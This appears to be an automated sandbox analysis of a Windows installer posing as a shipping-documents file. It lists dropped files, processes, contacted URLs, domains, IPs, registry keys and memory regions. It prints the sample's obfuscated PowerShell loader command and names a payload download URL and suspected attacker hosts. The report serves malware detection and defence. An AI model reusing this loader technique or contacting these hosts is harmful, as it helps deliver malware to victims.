Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Shipping documents 000022999878999800009999.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3z0ymdb.4qg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3lkhfpk.zu3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\Andenhaandsvidens.Typ
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\afplingen.che
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\forlggere.bov
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\rettersted.bef
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\acneform\Baroco\xenosaurid.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
|
"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wabmig.exe
|
"C:\Program Files (x86)\windows mail\wabmig.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
https://go.micXO
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
http://185.29.11.53/bgJJbKBK219.bin-
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://185.29.11.53/bgJJbKBK219.bine
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://ftp.concaribe.com
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://concaribe.com
|
unknown
|
||
|
https://api.ipify.org/t
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://185.29.11.53/bgJJbKBK219.bin
|
185.29.11.53
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
concaribe.com
|
192.185.13.234
|
|
|
|
ftp.concaribe.com
|
unknown
|
|
|
|
api.ipify.org
|
104.26.13.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.185.13.234
|
concaribe.com
|
United States
|
|
|
|
185.29.11.53
|
unknown
|
European Union
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\multurer\Uninstall\temposkifts\indhalendes
|
symbolets
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wabmig_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
241CC000
|
trusted library allocation
|
page read and write
|
|
|
|
4687000
|
remote allocation
|
page execute and read and write
|
|
|
|
241A1000
|
trusted library allocation
|
page read and write
|
|
|
|
94D7000
|
direct allocation
|
page execute and read and write
|
|
|
|
8600000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
2903000
|
trusted library allocation
|
page execute and read and write
|
||
|
2680D000
|
stack
|
page read and write
|
||
|
267A0000
|
trusted library allocation
|
page read and write
|
||
|
2618C000
|
stack
|
page read and write
|
||
|
264ED000
|
heap
|
page read and write
|
||
|
26421000
|
heap
|
page read and write
|
||
|
6ECD000
|
stack
|
page read and write
|
||
|
8016000
|
heap
|
page read and write
|
||
|
748000
|
heap
|
page read and write
|
||
|
8AD7000
|
direct allocation
|
page execute and read and write
|
||
|
266DF000
|
stack
|
page read and write
|
||
|
42D0000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267D1000
|
trusted library allocation
|
page read and write
|
||
|
5087000
|
remote allocation
|
page execute and read and write
|
||
|
68C0000
|
direct allocation
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
267A0000
|
trusted library allocation
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page execute and read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
241C6000
|
trusted library allocation
|
page read and write
|
||
|
6D0F000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
6487000
|
remote allocation
|
page execute and read and write
|
||
|
23790000
|
direct allocation
|
page read and write
|
||
|
5D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
5916000
|
trusted library allocation
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
2411E000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
2935000
|
trusted library allocation
|
page execute and read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page read and write
|
||
|
23F1E000
|
stack
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
6FE81000
|
unkown
|
page execute read
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
6FE83000
|
unkown
|
page read and write
|
||
|
2645F000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
24151000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
6E0E000
|
stack
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
2679E000
|
stack
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
6F80000
|
trusted library allocation
|
page read and write
|
||
|
23780000
|
direct allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
2932000
|
trusted library allocation
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
439E000
|
stack
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
701B000
|
stack
|
page read and write
|
||
|
8713000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
4840000
|
direct allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
58B9000
|
trusted library allocation
|
page read and write
|
||
|
6FE80000
|
unkown
|
page readonly
|
||
|
234E000
|
stack
|
page read and write
|
||
|
23F70000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
direct allocation
|
page read and write
|
||
|
7B97000
|
stack
|
page read and write
|
||
|
47D0000
|
direct allocation
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page read and write
|
||
|
267A8000
|
trusted library allocation
|
page read and write
|
||
|
271FE000
|
stack
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
78C000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
240F0000
|
heap
|
page execute and read and write
|
||
|
23F60000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6FE82000
|
unkown
|
page readonly
|
||
|
27180000
|
trusted library allocation
|
page read and write
|
||
|
23740000
|
direct allocation
|
page read and write
|
||
|
4275000
|
heap
|
page execute and read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
8287000
|
remote allocation
|
page execute and read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
41E000
|
unkown
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
27170000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
23720000
|
direct allocation
|
page read and write
|
||
|
874F000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
7C9E000
|
stack
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
87A5000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
6FE84000
|
unkown
|
page readonly
|
||
|
48B1000
|
trusted library allocation
|
page read and write
|
||
|
2412D000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
7F370000
|
trusted library allocation
|
page execute and read and write
|
||
|
27001000
|
trusted library allocation
|
page read and write
|
||
|
4240000
|
trusted library allocation
|
page execute and read and write
|
||
|
A65000
|
heap
|
page read and write
|
||
|
6D70000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
2716E000
|
stack
|
page read and write
|
||
|
800000
|
trusted library allocation
|
page read and write
|
||
|
24106000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
2410B000
|
trusted library allocation
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
4800000
|
direct allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
26429000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
23C1F000
|
stack
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
6D60000
|
trusted library allocation
|
page read and write
|
||
|
872F000
|
heap
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2671E000
|
stack
|
page read and write
|
||
|
23C9B000
|
stack
|
page read and write
|
||
|
6D12000
|
heap
|
page read and write
|
||
|
8830000
|
direct allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
C6D7000
|
direct allocation
|
page execute and read and write
|
||
|
47F0000
|
direct allocation
|
page read and write
|
||
|
240D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
43B000
|
unkown
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
240BE000
|
stack
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
93F000
|
stack
|
page read and write
|
||
|
8810000
|
heap
|
page readonly
|
||
|
6C20000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
8605000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
4830000
|
direct allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
578000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
6DC0000
|
heap
|
page execute and read and write
|
||
|
8850000
|
heap
|
page read and write
|
||
|
23D1E000
|
stack
|
page read and write
|
||
|
435E000
|
stack
|
page read and write
|
||
|
2920000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6C75000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
423E000
|
stack
|
page read and write
|
||
|
7887000
|
remote allocation
|
page execute and read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267F7000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
4270000
|
heap
|
page execute and read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
23E40000
|
direct allocation
|
page read and write
|
||
|
4820000
|
direct allocation
|
page read and write
|
||
|
964000
|
heap
|
page read and write
|
||
|
267D2000
|
trusted library allocation
|
page read and write
|
||
|
24126000
|
trusted library allocation
|
page read and write
|
||
|
82B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DB0000
|
trusted library allocation
|
page read and write
|
||
|
6EE0000
|
trusted library allocation
|
page read and write
|
||
|
26FAE000
|
stack
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
431E000
|
stack
|
page read and write
|
||
|
43A7000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
5BA5000
|
trusted library allocation
|
page read and write
|
||
|
43A0000
|
heap
|
page read and write
|
||
|
47E0000
|
direct allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
23ED8000
|
stack
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page execute and read and write
|
||
|
506000
|
heap
|
page read and write
|
||
|
6E87000
|
remote allocation
|
page execute and read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
292A000
|
trusted library allocation
|
page execute and read and write
|
||
|
80D000
|
trusted library allocation
|
page execute and read and write
|
||
|
476E000
|
stack
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
816000
|
trusted library allocation
|
page execute and read and write
|
||
|
2419D000
|
trusted library allocation
|
page read and write
|
||
|
7EEC000
|
stack
|
page read and write
|
||
|
465000
|
unkown
|
page readonly
|
||
|
2900000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
262FC000
|
stack
|
page read and write
|
||
|
3C87000
|
remote allocation
|
page execute and read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
BCD7000
|
direct allocation
|
page execute and read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
86D8000
|
heap
|
page read and write
|
||
|
28F0000
|
trusted library allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
4909000
|
trusted library allocation
|
page read and write
|
||
|
2910000
|
trusted library allocation
|
page read and write
|
||
|
306C000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
8607000
|
heap
|
page read and write
|
||
|
A8D7000
|
direct allocation
|
page execute and read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
8840000
|
direct allocation
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
237A0000
|
direct allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
779000
|
heap
|
page read and write
|
||
|
8751000
|
heap
|
page read and write
|
||
|
240D0000
|
trusted library allocation
|
page read and write
|
||
|
26190000
|
remote allocation
|
page read and write
|
||
|
271BE000
|
stack
|
page read and write
|
||
|
810000
|
trusted library allocation
|
page read and write
|
||
|
23770000
|
direct allocation
|
page read and write
|
||
|
86D0000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
6EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2712E000
|
stack
|
page read and write
|
||
|
825000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B5E000
|
stack
|
page read and write
|
||
|
7F80000
|
heap
|
page read and write
|
||
|
5FA000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
262B0000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
240E0000
|
heap
|
page read and write
|
||
|
267C1000
|
trusted library allocation
|
page read and write
|
||
|
827000
|
trusted library allocation
|
page execute and read and write
|
||
|
26FEE000
|
stack
|
page read and write
|
||
|
2A18000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
3AF0000
|
remote allocation
|
page execute and read and write
|
||
|
81A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8793000
|
heap
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
23750000
|
direct allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
267BD000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
23FA8000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
5ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
4870000
|
direct allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
B2D7000
|
direct allocation
|
page execute and read and write
|
||
|
6DF000
|
stack
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
24112000
|
trusted library allocation
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
6CFD000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
290D000
|
trusted library allocation
|
page execute and read and write
|
||
|
240D0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
42F000
|
unkown
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
5E4000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
2919000
|
trusted library allocation
|
page read and write
|
||
|
24100000
|
trusted library allocation
|
page read and write
|
||
|
8026000
|
heap
|
page read and write
|
||
|
7FA0000
|
heap
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
heap
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
8500000
|
heap
|
page read and write
|
||
|
23C5D000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
461000
|
unkown
|
page read and write
|
||
|
786000
|
heap
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
4A06000
|
trusted library allocation
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
230F000
|
stack
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page read and write
|
||
|
8940000
|
direct allocation
|
page execute and read and write
|
||
|
26F1F000
|
stack
|
page read and write
|
||
|
6CDD000
|
heap
|
page read and write
|
||
|
7C50000
|
heap
|
page read and write
|
||
|
6B22000
|
heap
|
page read and write
|
||
|
D0D7000
|
direct allocation
|
page execute and read and write
|
||
|
70A0000
|
heap
|
page read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
4810000
|
direct allocation
|
page read and write
|
||
|
6C40000
|
heap
|
page read and write
|
||
|
42BE000
|
stack
|
page read and write
|
||
|
23F5E000
|
stack
|
page read and write
|
||
|
23F90000
|
heap
|
page read and write
|
||
|
264D2000
|
heap
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
68B0000
|
direct allocation
|
page read and write
|
||
|
267B3000
|
trusted library allocation
|
page read and write
|
||
|
264E9000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2645F000
|
heap
|
page read and write
|
||
|
6D40000
|
trusted library allocation
|
page read and write
|
||
|
251AF000
|
trusted library allocation
|
page read and write
|
||
|
71E000
|
stack
|
page read and write
|
||
|
5A41000
|
trusted library allocation
|
page read and write
|
||
|
7C2D000
|
stack
|
page read and write
|
||
|
6AAE000
|
stack
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
4860000
|
direct allocation
|
page read and write
|
||
|
2411A000
|
trusted library allocation
|
page read and write
|
||
|
23760000
|
direct allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page readonly
|
||
|
2418F000
|
trusted library allocation
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
28D0000
|
trusted library section
|
page read and write
|
||
|
812000
|
trusted library allocation
|
page read and write
|
||
|
6F10000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6D50000
|
trusted library allocation
|
page read and write
|
||
|
23730000
|
direct allocation
|
page read and write
|
||
|
9EE000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
2F6C000
|
stack
|
page read and write
|
||
|
822000
|
trusted library allocation
|
page read and write
|
||
|
6CA4000
|
heap
|
page read and write
|
||
|
23B00000
|
heap
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
23CD0000
|
trusted library allocation
|
page read and write
|
||
|
47C0000
|
direct allocation
|
page read and write
|
||
|
81C0000
|
direct allocation
|
page execute and read and write
|
||
|
2930000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
23DEE000
|
stack
|
page read and write
|
||
|
263FC000
|
stack
|
page read and write
|
||
|
27AF000
|
stack
|
page read and write
|
||
|
27180000
|
trusted library allocation
|
page read and write
|
||
|
241CA000
|
trusted library allocation
|
page read and write
|
||
|
27000000
|
trusted library allocation
|
page read and write
|
||
|
267BD000
|
trusted library allocation
|
page read and write
|
||
|
5A5A000
|
trusted library allocation
|
page read and write
|
||
|
7EFA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E8E000
|
stack
|
page read and write
|
||
|
26433000
|
heap
|
page read and write
|
||
|
4EEA000
|
trusted library allocation
|
page read and write
|
||
|
801E000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
23710000
|
direct allocation
|
page read and write
|
||
|
9AE000
|
stack
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
241C8000
|
trusted library allocation
|
page read and write
|
||
|
791000
|
heap
|
page read and write
|
||
|
48A0000
|
heap
|
page execute and read and write
|
||
|
7F8C000
|
heap
|
page read and write
|
||
|
23E50000
|
direct allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
5A55000
|
trusted library allocation
|
page read and write
|
||
|
2904000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
29F8000
|
trusted library allocation
|
page read and write
|
||
|
26190000
|
remote allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
24140000
|
heap
